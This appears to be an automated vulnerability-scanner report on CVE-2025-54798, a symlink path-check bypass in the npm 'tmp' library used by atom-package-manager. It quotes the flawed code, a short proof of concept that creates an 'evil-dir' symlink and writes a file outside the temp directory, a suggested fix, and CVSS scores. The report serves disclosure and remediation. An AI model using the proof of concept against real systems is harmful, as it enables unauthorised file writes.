  • Scope: Unchanged
• Impact Metrics:
  • Confidentiality Impact: None
  • Integrity Impact: None
  • Availability Impact: Low

For more information on CVSS3 Scores, click here.

CVE-2025-54798

Vulnerable Library - tmp-0.0.28.tgz

Temporary file and directory creator

Library home page: https://registry.npmjs.org/tmp/-/tmp-0.0.28.tgz

Path to dependency file: /apm/package.json

Path to vulnerable library: /apm/package.json

Dependency Hierarchy:

• atom-package-manager-2.6.5.tgz (Root Library)
  • asar-require-0.3.0.tgz
    • asar-0.12.1.tgz
      • ❌ tmp-0.0.28.tgz (Vulnerable Library)

Found in base branch: electron-upgrade

Vulnerability Details

Summary "tmp@0.2.3" is vulnerable to an Arbitrary temporary file / directory write via symbolic link "dir" parameter. Details According to the documentation there are some conditions that must be held: // https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L41-L50 Other breaking changes, i.e. - template must be relative to tmpdir - name must be relative to tmpdir - dir option must be relative to tmpdir //<-- this assumption can be bypassed using symlinks are still in place. In order to override the system's tmpdir, you will have to use the newly introduced tmpdir option. // https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L375 * "dir": the optional temporary directory that must be relative to the system's default temporary directory. absolute paths are fine as long as they point to a location under the system's default temporary directory. Any directories along the so specified path must exist, otherwise a ENOENT error will be thrown upon access, as tmp will not check the availability of the path, nor will it establish the requested path for you. Related issue: raszi/node-tmp#207. The issue occurs because "_resolvePath" does not properly handle symbolic link when resolving paths: // https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L573-L579 function _resolvePath(name, tmpDir) { if (name.startsWith(tmpDir)) { return path.resolve(name); } else { return path.resolve(path.join(tmpDir, name)); } } If the "dir" parameter points to a symlink that resolves to a folder outside the "tmpDir", it's possible to bypass the "_assertIsRelative" check used in "_assertAndSanitizeOptions": // https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L590-L609 function _assertIsRelative(name, option, tmpDir) { if (option === 'name') { // assert that name is not absolute and does not contain a path if (path.isAbsolute(name)) throw new Error("${option} option must not contain an absolute path, found "${name}"."); // must not fail on valid . or .. or similar such constructs let basename = path.basename(name); if (basename === '..' || basename === '.' || basename !== name) throw new Error("${option} option must not contain a path, found "${name}"."); } else { // if (option === 'dir' || option === 'template') { // assert that dir or template are relative to tmpDir if (path.isAbsolute(name) && !name.startsWith(tmpDir)) { throw new Error("${option} option must be relative to "${tmpDir}", found "${name}"."); } let resolvedPath = _resolvePath(name, tmpDir); //<--- if (!resolvedPath.startsWith(tmpDir)) throw new Error("${option} option must be relative to "${tmpDir}", found "${resolvedPath}"."); } } PoC The following PoC demonstrates how writing a tmp file on a folder outside the "tmpDir" is possible. Tested on a Linux machine. - Setup: create a symbolic link inside the "tmpDir" that points to a directory outside of it mkdir $HOME/mydir1 ln -s $HOME/mydir1 ${TMPDIR:-/tmp}/evil-dir - check the folder is empty: ls -lha $HOME/mydir1 | grep "tmp-" - run the poc node main.js File: /tmp/evil-dir/tmp-26821-Vw87SLRaBIlf test 1: ENOENT: no such file or directory, open '/tmp/mydir1/tmp-[random-id]' test 2: dir option must be relative to "/tmp", found "/foo". test 3: dir option must be relative to "/tmp", found "/home/user/mydir1". - the temporary file is created under "$HOME/mydir1" (outside the "tmpDir"): ls -lha $HOME/mydir1 | grep "tmp-" -rw------- 1 user user 0 Apr X XX:XX tmp-[random-id] - "main.js" // npm i tmp@0.2.3 const tmp = require('tmp'); const tmpobj = tmp.fileSync({ 'dir': 'evil-dir'}); console.log('File: ', tmpobj.name); try { tmp.fileSync({ 'dir': 'mydir1'}); } catch (err) { console.log('test 1:', err.message) } try { tmp.fileSync({ 'dir': '/foo'}); } catch (err) { console.log('test 2:', err.message) } try { const fs = require('node:fs'); const resolved = fs.realpathSync('/tmp/evil-dir'); tmp.fileSync({ 'dir': resolved}); } catch (err) { console.log('test 3:', err.message) } A Potential fix could be to call "fs.realpathSync" (or similar) that resolves also symbolic links. function _resolvePath(name, tmpDir) { let resolvedPath; if (name.startsWith(tmpDir)) { resolvedPath = path.resolve(name); } else { resolvedPath = path.resolve(path.join(tmpDir, name)); } return fs.realpathSync(resolvedPath); } Impact Arbitrary temporary file / directory write via symlink

Publish Date: 2025-08-07

URL: CVE-2025-54798

CVSS 3 Score Details (2.5)

Base Score Metrics:

• Exploitability Metrics:
  • Attack Vector: Local
  • Attack Complexity: High
  • Privileges Required: Low
  • User Interaction: None
  • Scope: Unchanged
• Impact Metrics:
  • Confidentiality Impact: None
  • Integrity Impact: Low
  • Availability Impact: None

For more information on CVSS3 Scores, click here.